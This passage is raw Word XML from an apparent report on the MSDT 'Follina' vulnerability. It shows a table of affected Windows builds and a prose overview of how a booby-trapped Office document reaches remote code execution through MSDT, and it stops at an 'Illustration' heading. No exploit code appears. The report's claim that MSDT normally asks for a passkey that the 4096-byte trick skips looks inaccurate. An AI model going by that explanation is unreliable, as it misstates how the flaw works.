                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="111111"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>(MSDT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30D07023" w14:textId="4FEE4A40" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>from 10.0.0 before 10.0.19043.1766 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE329E" w:rsidRPr="003907CB" w14:paraId="5F71547D" w14:textId="77777777" w:rsidTr="00CE329E">
        <w:trPr>
          <w:trHeight w:val="822"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D203D7A" w14:textId="13195156" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68E342B1" w14:textId="403AFDD8" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Microsoft Windows 10 Version 21H2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7182642D" w14:textId="322929DA" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="111111"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="111111"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>(MSDT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="324A176C" w14:textId="703756A0" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>From 10.0.0 before 10.0.19044.1766</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE329E" w:rsidRPr="003907CB" w14:paraId="23B5F8F4" w14:textId="77777777" w:rsidTr="00CE329E">
        <w:trPr>
          <w:trHeight w:val="831"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="780FE393" w14:textId="6068045D" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="149A7F82" w14:textId="7606C672" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Microsoft Windows Server 2019</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="061A5082" w14:textId="1B7D0DAB" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="111111"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>(MSDT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A8F3A22" w14:textId="0EACD83A" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>From 10.0.0 before 10.0.17763.3046</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE329E" w:rsidRPr="003907CB" w14:paraId="76549E66" w14:textId="77777777" w:rsidTr="00CE329E">
        <w:trPr>
          <w:trHeight w:val="831"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="171C70E0" w14:textId="6AB3227D" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3922F8BF" w14:textId="15424DF4" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Microsoft Windows Server 2019 (Server Core installation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DAD9A25" w14:textId="2782209B" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="111111"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>(MSDT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57FF405A" w14:textId="385290BC" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>from 10.0.0 before 10.0.17763.3046</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE329E" w:rsidRPr="003907CB" w14:paraId="2D005B58" w14:textId="77777777" w:rsidTr="00CE329E">
        <w:trPr>
          <w:trHeight w:val="831"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57B5B336" w14:textId="0B954E9B" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70A8FD79" w14:textId="04626F79" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Microsoft Windows Server 2022</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E110983" w14:textId="44D4D6CF" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="111111"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>(MSDT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EA6B87D" w14:textId="256CE3C5" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>From 10.0.0 before 10.0.20348.770</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE329E" w:rsidRPr="003907CB" w14:paraId="5BE8A955" w14:textId="77777777" w:rsidTr="00CE329E">
        <w:trPr>
          <w:trHeight w:val="822"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01F34B05" w14:textId="71AA6DEE" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D91A148" w14:textId="410875E4" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Microsoft Windows 11 version 21H2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06E53648" w14:textId="45EC9829" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="111111"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t xml:space="preserve"> (MSDT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22601A96" w14:textId="76D1C694" w:rsidR="00CE329E" w:rsidRPr="003907CB" w:rsidRDefault="00CE329E" w:rsidP="00CE329E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003907CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>From 10.0.0 before 10.0.22000.739</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D010C65" w14:textId="77777777" w:rsidR="009614D3" w:rsidRDefault="009614D3" w:rsidP="007A6C87">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2042ECF8" w14:textId="1C6D0555" w:rsidR="00971DEC" w:rsidRPr="0035550F" w:rsidRDefault="009614D3" w:rsidP="007A6C87">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00BE5F52" w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>TECHNICAL OVERVIEW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C14069" w14:textId="6E3DFC88" w:rsidR="00BE5F52" w:rsidRPr="003907CB" w:rsidRDefault="009614D3" w:rsidP="007A6C87">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2.1 </w:t>
      </w:r>
      <w:r w:rsidR="00BE5F52" w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BAD611" w14:textId="77777777" w:rsidR="00C20E63" w:rsidRPr="00C20E63" w:rsidRDefault="00C20E63" w:rsidP="009001A3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>By luring some users into opening a Microsoft Office document that links to an external HTML file, the attack is carried out. The HTML file then loads code that can be used to invoke PowerShell scripts with specific parameters or syntax using the MSDT interface. A common security feature for documents acquired from the internet requires users to enable editing while the document is opened in protected view. This can be done by opening the Microsoft Word document. Interestingly, macros are not used in the infected document. As an alternative, it has an external reference that loads and runs code from a different location. This permits low-privilege remote code execution using the rights of the user account that opened the document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114C9C59" w14:textId="77777777" w:rsidR="00F47D57" w:rsidRPr="003907CB" w:rsidRDefault="00F47D57" w:rsidP="00BE5F52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BF572D8" w14:textId="77777777" w:rsidR="00CE329E" w:rsidRDefault="000E09FC" w:rsidP="009001A3">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D42E75A" wp14:editId="45F0A62C">
            <wp:extent cx="5801647" cy="5988050"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="1609091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91893" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5806393" cy="5992949"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6806E880" w14:textId="082D916A" w:rsidR="00E115DF" w:rsidRPr="009001A3" w:rsidRDefault="003907CB" w:rsidP="009001A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0027035D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Figure 1: Outline of a cyber-attack using a malicious Microsoft file to deploy malware through MSDT.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48662B46" w14:textId="46989E8A" w:rsidR="007A6C87" w:rsidRPr="005F6209" w:rsidRDefault="009614D3" w:rsidP="00F2280B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:r w:rsidR="007A6C87" w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Why it exists:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E515BD1" w14:textId="72DF6898" w:rsidR="007A6C87" w:rsidRPr="009001A3" w:rsidRDefault="00C20E63" w:rsidP="009001A3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Threat actors usually install mechanisms or migrate laterally once they have gained access in order to sustain access or escalate privileges to the administrator or root levels. As a precaution, the Microsoft Support Diagnostic Tool (MSDT) would often ask for a passkey prior to running code. But if the HTML file in question is greater than 4096 bytes, MSDT does not ask for a passkey, which results in automatic code execution because of internal processing constraints. This is a security vulnerability that has been found. An extensive investigation of this issue was conducted by "Crazy Man," a security researcher from the "Shadow Tracers Group." Microsoft's official security update acknowledged and highlighted his discoveries, especially the 4096-byte critical buffer size that allows for unexpected code execution</w:t>
      </w:r>
      <w:r w:rsidR="008C1682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> [6]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C20E63">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4F7DD8" w14:textId="0805124A" w:rsidR="00FB7F11" w:rsidRPr="003907CB" w:rsidRDefault="009614D3" w:rsidP="009001A3">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="00FB7F11" w:rsidRPr="003907CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ILLUSTRATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794C59F0" w14:textId="7A67BAFB" w:rsidR="000B3A0B" w:rsidRPr="005F6209" w:rsidRDefault="009614D3" w:rsidP="00F2280B">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3.1 </w:t>
      </w:r>
      <w:r w:rsidR="000B3A0B" w:rsidRPr="005F6209">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
